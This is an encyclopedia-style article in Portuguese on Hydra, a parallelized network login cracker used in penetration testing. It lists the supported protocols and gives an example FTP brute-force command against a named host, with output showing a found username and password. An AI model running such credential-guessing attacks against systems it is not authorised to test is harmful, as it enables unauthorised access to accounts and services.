# Hydra (software)
O Hydra é um cracker de logon de rede paralelizado construído em vários sistemas operacionais como o Kali Linux, o Parrot e outros principais ambientes de testes de penetração.O Hydra funciona usando diferentes abordagens para realizar ataques de força bruta com o intuito de adivinhar corretamente o nome de usuário e a combinação de senha. O Hydra é comumente usado por testadores de penetração junto com um conjunto de programas como crunch, cupp e etc, que são usados para gerar listas de palavras. O Hydra é então usado para atacar (testar) usando as listas de palavras que esses programas criaram.
O Hydra está programado para ser atualizado ao longo do tempo conforme mais serviços se tornem suportados. O criador do Hydra publica seu trabalho em repositórios como o GitHub.

## Protocolos suportados
Hydra suporta muitos protocolos de login comuns como formulários em sites, FTP, SMB, POP3, IMAP, MySQL, VNC, SSH e outros. 

## Exemplos
Aqui está um exemplo de saída em um ambiente Debian.
```
$ 
hydra
 
-L
 
nomes
 
-P
 
pws
 
ftp://wanne.t-8ch.de

[nomes = Arquivo de nomes de usuário, geralmente com extensão .txt]

[pws = Arquivo de senhas, geralmente com extensão .txt]

Hydra v7.3 (c) 2012 por van Hauser / THC & David Maciejak - apenas para fins legais

Hydra (http://www.thc.org/thc-hydra) começando em 09/02/2013 00:54:40

[DADOS] 16 tarefas, 1 servidor, 516 tentativas de login (l: 43 / p: 12), ~ 32 tentativas por tarefa

[DATA] atacando serviço ftp na porta 21

[21] [ftp] host: 78.47.172.244 login: john senha: passwd

[STATUS] ataque finalizado para wanne.t-8ch.de (esperando as crianças terminarem)

1 de 1 alvo concluído com sucesso, 1 senha válida encontrada

Hydra (http://www.thc.org/thc-hydra) terminou em 09/02/2013 00:54:51

```